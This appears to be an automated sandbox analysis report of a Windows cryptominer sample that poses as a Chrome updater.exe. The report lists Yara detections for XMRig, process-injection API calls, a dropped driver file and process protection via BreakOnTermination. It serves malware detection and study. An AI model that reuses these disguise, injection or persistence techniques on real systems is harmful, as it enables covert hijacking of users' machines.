Source: lsass.exe, 00000008.00000002.3001024698.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000002.3002480815.00000202C0390000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C03B2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000003.2251755784.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748160147.00000202C037F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000008.00000000.1748331795.00000202C0390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0~
Source: powershell.exe, 00000005.00000002.1784891637.000001FA2FC41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000005.00000002.1784891637.000001FA2FE68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1819526785.000001FA481B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000005.00000002.1813646809.000001FA3FCB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.1813646809.000001FA3FCB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.1813646809.000001FA3FCB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000005.00000002.1784891637.000001FA2FE68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000005.00000002.1813646809.000001FA3FCB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: svchost.exe, 00000011.00000003.1846316422.000001D5599B5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns2-by3p.notify.windows.com/?token=AwYAAACklixT6U5TxXWj7Y4oTt3JqNuZjYaQtFRvg3Ifna8Pnwup50yq

Operating System Destruction

Protects its processes via BreakOnTermination flag

Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Process information set: 01 00 00 00			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Process information set: 01 00 00 00			Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 21.2.updater.exe.7ff750fc1860.5.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 21.2.updater.exe.7ff750fc1860.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 21.2.updater.exe.7ff750fc1860.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 21.2.updater.exe.7ff750f60000.4.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 21.2.updater.exe.7ff750f60000.4.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 21.2.updater.exe.7ff750f60000.4.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 21.2.updater.exe.7ff750f7ea80.6.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 21.2.updater.exe.7ff750f7ea80.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 21.2.updater.exe.7ff750f7ea80.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 21.2.updater.exe.7ff750f9fc40.7.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 21.2.updater.exe.7ff750f9fc40.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 21.2.updater.exe.7ff750f9fc40.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 00000015.00000002.2005902110.00007FF750F7B000.00000004.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown

Contains functionality to call native functions

Source: C:\Windows\System32\dialer.exe	Code function: 4_2_00007FF78AB310C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,	4_2_00007FF78AB310C0
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC642A7C NtEnumerateValueKey,NtEnumerateValueKey,	7_2_00000225DC642A7C
Source: C:\Windows\System32\lsass.exe	Code function: 8_2_00000202C0AE21CC NtQuerySystemInformation,StrCmpNIW,	8_2_00000202C0AE21CC
Source: C:\Windows\System32\lsass.exe	Code function: 8_2_00000202C0AE26F0 NtQueryDirectoryFileEx,GetFileType,StrCpyW,	8_2_00000202C0AE26F0
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAE292A7C NtEnumerateValueKey,NtEnumerateValueKey,	10_2_000002BAAE292A7C
Source: C:\Windows\System32\svchost.exe	Code function: 15_2_000001845B3B23F0 GetProcessIdOfThread,GetCurrentProcessId,CreateFileW,WriteFile,ReadFile,CloseHandle,NtResumeThread,	15_2_000001845B3B23F0
Source: C:\Windows\System32\svchost.exe	Code function: 15_2_000001845B3B21CC NtQuerySystemInformation,StrCmpNIW,	15_2_000001845B3B21CC

Creates driver files

Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe

File created: C:\Users\user\AppData\Roaming\Google\Libs\WR64.sys

Jump to behavior

Detected potential crypto function

Source: C:\Windows\System32\dialer.exe	Code function: 4_2_00007FF78AB314E4	4_2_00007FF78AB314E4
Source: C:\Windows\System32\dialer.exe	Code function: 4_2_00007FF78AB32328	4_2_00007FF78AB32328
Source: C:\Windows\System32\dialer.exe	Code function: 4_2_00007FF78AB326E8	4_2_00007FF78AB326E8
Source: C:\Windows\System32\dialer.exe	Code function: 4_2_00007FF78AB31DB4	4_2_00007FF78AB31DB4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFD9B7F52FA	5_2_00007FFD9B7F52FA
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC621658	7_2_00000225DC621658
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC61B23C	7_2_00000225DC61B23C
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC61F2F8	7_2_00000225DC61F2F8
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC61B030	7_2_00000225DC61B030
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC6120DC	7_2_00000225DC6120DC
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC652258	7_2_00000225DC652258
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC64BE3C	7_2_00000225DC64BE3C
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC64FEF8	7_2_00000225DC64FEF8
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC64BC30	7_2_00000225DC64BC30
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC642CDC	7_2_00000225DC642CDC
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC681658	7_2_00000225DC681658
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC67B23C	7_2_00000225DC67B23C
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC67F2F8	7_2_00000225DC67F2F8
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC67B030	7_2_00000225DC67B030
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC6720DC	7_2_00000225DC6720DC
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC6B2258	7_2_00000225DC6B2258
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC6ABE3C	7_2_00000225DC6ABE3C
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC6AFEF8	7_2_00000225DC6AFEF8
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC6ABC30	7_2_00000225DC6ABC30
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC6A2CDC	7_2_00000225DC6A2CDC
Source: C:\Windows\System32\lsass.exe	Code function: 8_2_00000202C0AC1658	8_2_00000202C0AC1658
Source: C:\Windows\System32\lsass.exe	Code function: 8_2_00000202C0ABB23C	8_2_00000202C0ABB23C
Source: C:\Windows\System32\lsass.exe	Code function: 8_2_00000202C0ABF2F8	8_2_00000202C0ABF2F8
Source: C:\Windows\System32\lsass.exe	Code function: 8_2_00000202C0ABB030	8_2_00000202C0ABB030
Source: C:\Windows\System32\lsass.exe	Code function: 8_2_00000202C0AB20DC	8_2_00000202C0AB20DC
Source: C:\Windows\System32\lsass.exe	Code function: 8_2_00000202C0AF2258	8_2_00000202C0AF2258
Source: C:\Windows\System32\lsass.exe	Code function: 8_2_00000202C0AEBE3C	8_2_00000202C0AEBE3C
Source: C:\Windows\System32\lsass.exe	Code function: 8_2_00000202C0AEFEF8	8_2_00000202C0AEFEF8
Source: C:\Windows\System32\lsass.exe	Code function: 8_2_00000202C0AEBC30	8_2_00000202C0AEBC30
Source: C:\Windows\System32\lsass.exe	Code function: 8_2_00000202C0AE2CDC	8_2_00000202C0AE2CDC
Source: C:\Windows\System32\svchost.exe	Code function: 9_2_000002A6612DF2F8	9_2_000002A6612DF2F8
Source: C:\Windows\System32\svchost.exe	Code function: 9_2_000002A6612E1658	9_2_000002A6612E1658
Source: C:\Windows\System32\svchost.exe	Code function: 9_2_000002A6612DB23C	9_2_000002A6612DB23C
Source: C:\Windows\System32\svchost.exe	Code function: 9_2_000002A6612DB030	9_2_000002A6612DB030
Source: C:\Windows\System32\svchost.exe	Code function: 9_2_000002A6612D20DC	9_2_000002A6612D20DC
Source: C:\Windows\System32\svchost.exe	Code function: 9_2_000002A66130FEF8	9_2_000002A66130FEF8
Source: C:\Windows\System32\svchost.exe	Code function: 9_2_000002A661312258	9_2_000002A661312258
Source: C:\Windows\System32\svchost.exe	Code function: 9_2_000002A66130BE3C	9_2_000002A66130BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 9_2_000002A66130BC30	9_2_000002A66130BC30
Source: C:\Windows\System32\svchost.exe	Code function: 9_2_000002A661302CDC	9_2_000002A661302CDC
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAE26B23C	10_2_000002BAAE26B23C
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAE271658	10_2_000002BAAE271658
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAE26F2F8	10_2_000002BAAE26F2F8
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAE26B030	10_2_000002BAAE26B030
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAE2620DC	10_2_000002BAAE2620DC
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAE29BE3C	10_2_000002BAAE29BE3C
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAE2A2258	10_2_000002BAAE2A2258
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAE29FEF8	10_2_000002BAAE29FEF8
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAE29BC30	10_2_000002BAAE29BC30
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAE292CDC	10_2_000002BAAE292CDC
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAED91658	10_2_000002BAAED91658
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAED8B23C	10_2_000002BAAED8B23C
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAED8F2F8	10_2_000002BAAED8F2F8
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAED8B030	10_2_000002BAAED8B030
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAED820DC	10_2_000002BAAED820DC
Source: C:\Windows\System32\svchost.exe	Code function: 11_2_0000026A879920DC	11_2_0000026A879920DC
Source: C:\Windows\System32\svchost.exe	Code function: 11_2_0000026A8799B030	11_2_0000026A8799B030
Source: C:\Windows\System32\svchost.exe	Code function: 11_2_0000026A8799F2F8	11_2_0000026A8799F2F8
Source: C:\Windows\System32\svchost.exe	Code function: 11_2_0000026A8799B23C	11_2_0000026A8799B23C
Source: C:\Windows\System32\svchost.exe	Code function: 11_2_0000026A879A1658	11_2_0000026A879A1658
Source: C:\Windows\System32\svchost.exe	Code function: 11_2_0000026A879C2CDC	11_2_0000026A879C2CDC
Source: C:\Windows\System32\svchost.exe	Code function: 11_2_0000026A879CBC30	11_2_0000026A879CBC30
Source: C:\Windows\System32\svchost.exe	Code function: 11_2_0000026A879CFEF8	11_2_0000026A879CFEF8
Source: C:\Windows\System32\svchost.exe	Code function: 11_2_0000026A879CBE3C	11_2_0000026A879CBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 11_2_0000026A879D2258	11_2_0000026A879D2258
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_0000017953781658	12_2_0000017953781658
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_000001795377B23C	12_2_000001795377B23C
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_00000179537720DC	12_2_00000179537720DC
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_000001795377B030	12_2_000001795377B030
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_000001795377F2F8	12_2_000001795377F2F8
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_00000179537B2258	12_2_00000179537B2258
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_00000179537ABE3C	12_2_00000179537ABE3C
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_00000179537A2CDC	12_2_00000179537A2CDC
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_00000179537ABC30	12_2_00000179537ABC30
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_00000179537AFEF8	12_2_00000179537AFEF8
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_0000017953D52258	12_2_0000017953D52258
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_0000017953D4BE3C	12_2_0000017953D4BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_0000017953D42CDC	12_2_0000017953D42CDC
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_0000017953D4BC30	12_2_0000017953D4BC30
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_0000017953D4FEF8	12_2_0000017953D4FEF8
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_000002295D541658	13_2_000002295D541658
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_000002295D53B23C	13_2_000002295D53B23C
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_000002295D53F2F8	13_2_000002295D53F2F8
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_000002295D53B030	13_2_000002295D53B030
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_000002295D5320DC	13_2_000002295D5320DC
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_000002295D572258	13_2_000002295D572258
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_000002295D56BE3C	13_2_000002295D56BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_000002295D56FEF8	13_2_000002295D56FEF8
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_000002295D56BC30	13_2_000002295D56BC30
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_000002295D562CDC	13_2_000002295D562CDC
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_00000253067E1658	14_2_00000253067E1658
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_00000253067DB23C	14_2_00000253067DB23C
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_00000253067DF2F8	14_2_00000253067DF2F8
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_00000253067DB030	14_2_00000253067DB030
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_00000253067D20DC	14_2_00000253067D20DC
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_0000025306E72258	14_2_0000025306E72258
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_0000025306E6BE3C	14_2_0000025306E6BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_0000025306E6FEF8	14_2_0000025306E6FEF8
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_0000025306E62CDC	14_2_0000025306E62CDC
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_0000025306E6BC30	14_2_0000025306E6BC30
Source: C:\Windows\System32\svchost.exe	Code function: 15_2_000001845B3BBC30	15_2_000001845B3BBC30
Source: C:\Windows\System32\svchost.exe	Code function: 15_2_000001845B3B2CDC	15_2_000001845B3B2CDC
Source: C:\Windows\System32\svchost.exe	Code function: 15_2_000001845B3BBE3C	15_2_000001845B3BBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 15_2_000001845B3C2258	15_2_000001845B3C2258
Source: C:\Windows\System32\svchost.exe	Code function: 15_2_000001845B3BFEF8	15_2_000001845B3BFEF8
Source: C:\Windows\System32\svchost.exe	Code function: 16_2_000001ADECD42CDC	16_2_000001ADECD42CDC
Source: C:\Windows\System32\svchost.exe	Code function: 16_2_000001ADECD4BC30	16_2_000001ADECD4BC30
Source: C:\Windows\System32\svchost.exe	Code function: 16_2_000001ADECD4FEF8	16_2_000001ADECD4FEF8
Source: C:\Windows\System32\svchost.exe	Code function: 16_2_000001ADECD52258	16_2_000001ADECD52258
Source: C:\Windows\System32\svchost.exe	Code function: 16_2_000001ADECD4BE3C	16_2_000001ADECD4BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 17_2_000001D5590420DC	17_2_000001D5590420DC
Source: C:\Windows\System32\svchost.exe	Code function: 17_2_000001D55904B030	17_2_000001D55904B030
Source: C:\Windows\System32\svchost.exe	Code function: 17_2_000001D55904B23C	17_2_000001D55904B23C
Source: C:\Windows\System32\svchost.exe	Code function: 17_2_000001D559051658	17_2_000001D559051658
Source: C:\Windows\System32\svchost.exe	Code function: 17_2_000001D55904F2F8	17_2_000001D55904F2F8
Source: C:\Windows\System32\svchost.exe	Code function: 17_2_000001D559072CDC	17_2_000001D559072CDC
Source: C:\Windows\System32\svchost.exe	Code function: 17_2_000001D55907BC30	17_2_000001D55907BC30
Source: C:\Windows\System32\svchost.exe	Code function: 17_2_000001D55907BE3C	17_2_000001D55907BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 17_2_000001D559082258	17_2_000001D559082258
Source: C:\Windows\System32\svchost.exe	Code function: 17_2_000001D55907FEF8	17_2_000001D55907FEF8
Source: C:\Windows\System32\svchost.exe	Code function: 18_2_00000241A9EB2258	18_2_00000241A9EB2258
Source: C:\Windows\System32\svchost.exe	Code function: 18_2_00000241A9EA2CDC	18_2_00000241A9EA2CDC
Source: C:\Windows\System32\svchost.exe	Code function: 18_2_00000241A9EABC30	18_2_00000241A9EABC30
Source: C:\Windows\System32\svchost.exe	Code function: 18_2_00000241A9EAFEF8	18_2_00000241A9EAFEF8
Source: C:\Windows\System32\svchost.exe	Code function: 18_2_00000241A9EABE3C	18_2_00000241A9EABE3C
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 21_2_000002152C1AB030	21_2_000002152C1AB030
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 21_2_000002152C1A20DC	21_2_000002152C1A20DC
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 21_2_000002152C1AB23C	21_2_000002152C1AB23C
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 21_2_000002152C1B1658	21_2_000002152C1B1658
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 21_2_000002152C1AF2F8	21_2_000002152C1AF2F8
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 21_2_000002152C3EBC30	21_2_000002152C3EBC30
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 21_2_000002152C3E2CDC	21_2_000002152C3E2CDC
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 21_2_000002152C3F2258	21_2_000002152C3F2258
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 21_2_000002152C3EBE3C	21_2_000002152C3EBE3C
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 21_2_000002152C3EFEF8	21_2_000002152C3EFEF8
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 21_2_000002152C89B030	21_2_000002152C89B030
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 21_2_000002152C8920DC	21_2_000002152C8920DC
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 21_2_000002152C89B23C	21_2_000002152C89B23C
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 21_2_000002152C8A1658	21_2_000002152C8A1658
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Code function: 21_2_000002152C89F2F8	21_2_000002152C89F2F8
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_000001CD7316B23C	24_2_000001CD7316B23C
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_000001CD73171658	24_2_000001CD73171658
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_000001CD7316F2F8	24_2_000001CD7316F2F8
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_000001CD7316B030	24_2_000001CD7316B030
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_000001CD731620DC	24_2_000001CD731620DC
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_000001CD7319BE3C	24_2_000001CD7319BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_000001CD731A2258	24_2_000001CD731A2258
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_000001CD7319FEF8	24_2_000001CD7319FEF8
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_000001CD7319BC30	24_2_000001CD7319BC30
Source: C:\Windows\System32\svchost.exe	Code function: 24_2_000001CD73192CDC	24_2_000001CD73192CDC
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002824E8620DC	26_2_000002824E8620DC
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002824E86B23C	26_2_000002824E86B23C
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002824E86F2F8	26_2_000002824E86F2F8
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002824E871658	26_2_000002824E871658
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002824E86B030	26_2_000002824E86B030
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002824E892CDC	26_2_000002824E892CDC
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002824E89BE3C	26_2_000002824E89BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002824E89FEF8	26_2_000002824E89FEF8
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002824E8A2258	26_2_000002824E8A2258
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002824E89BC30	26_2_000002824E89BC30
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002824E8F2CDC	26_2_000002824E8F2CDC
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002824E8FBE3C	26_2_000002824E8FBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002824E8FFEF8	26_2_000002824E8FFEF8
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002824E902258	26_2_000002824E902258
Source: C:\Windows\System32\svchost.exe	Code function: 26_2_000002824E8FBC30	26_2_000002824E8FBC30
Source: C:\Windows\System32\svchost.exe	Code function: 27_2_0000021B473D1658	27_2_0000021B473D1658
Source: C:\Windows\System32\svchost.exe	Code function: 27_2_0000021B473CB23C	27_2_0000021B473CB23C
Source: C:\Windows\System32\svchost.exe	Code function: 27_2_0000021B473C20DC	27_2_0000021B473C20DC
Source: C:\Windows\System32\svchost.exe	Code function: 27_2_0000021B473CB030	27_2_0000021B473CB030
Source: C:\Windows\System32\svchost.exe	Code function: 27_2_0000021B473CF2F8	27_2_0000021B473CF2F8
Source: C:\Windows\System32\svchost.exe	Code function: 27_2_0000021B47B42258	27_2_0000021B47B42258
Source: C:\Windows\System32\svchost.exe	Code function: 27_2_0000021B47B3BE3C	27_2_0000021B47B3BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 27_2_0000021B47B32CDC	27_2_0000021B47B32CDC
Source: C:\Windows\System32\svchost.exe	Code function: 27_2_0000021B47B3BC30	27_2_0000021B47B3BC30
Source: C:\Windows\System32\svchost.exe	Code function: 27_2_0000021B47B3FEF8	27_2_0000021B47B3FEF8

PE file contains more sections than normal

Source: updater.exe.0.dr	Static PE information: Number of sections : 11 > 10
Source: ylVAEHbMLf.exe	Static PE information: Number of sections : 11 > 10

Yara signature match

Source: 21.2.updater.exe.7ff750fc1860.5.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 21.2.updater.exe.7ff750fc1860.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 21.2.updater.exe.7ff750fc1860.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 21.2.updater.exe.7ff750f60000.4.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 21.2.updater.exe.7ff750f60000.4.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 21.2.updater.exe.7ff750f60000.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 21.2.updater.exe.7ff750f7ea80.6.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 21.2.updater.exe.7ff750f7ea80.6.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 21.2.updater.exe.7ff750f7ea80.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 21.2.updater.exe.7ff750f9fc40.7.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
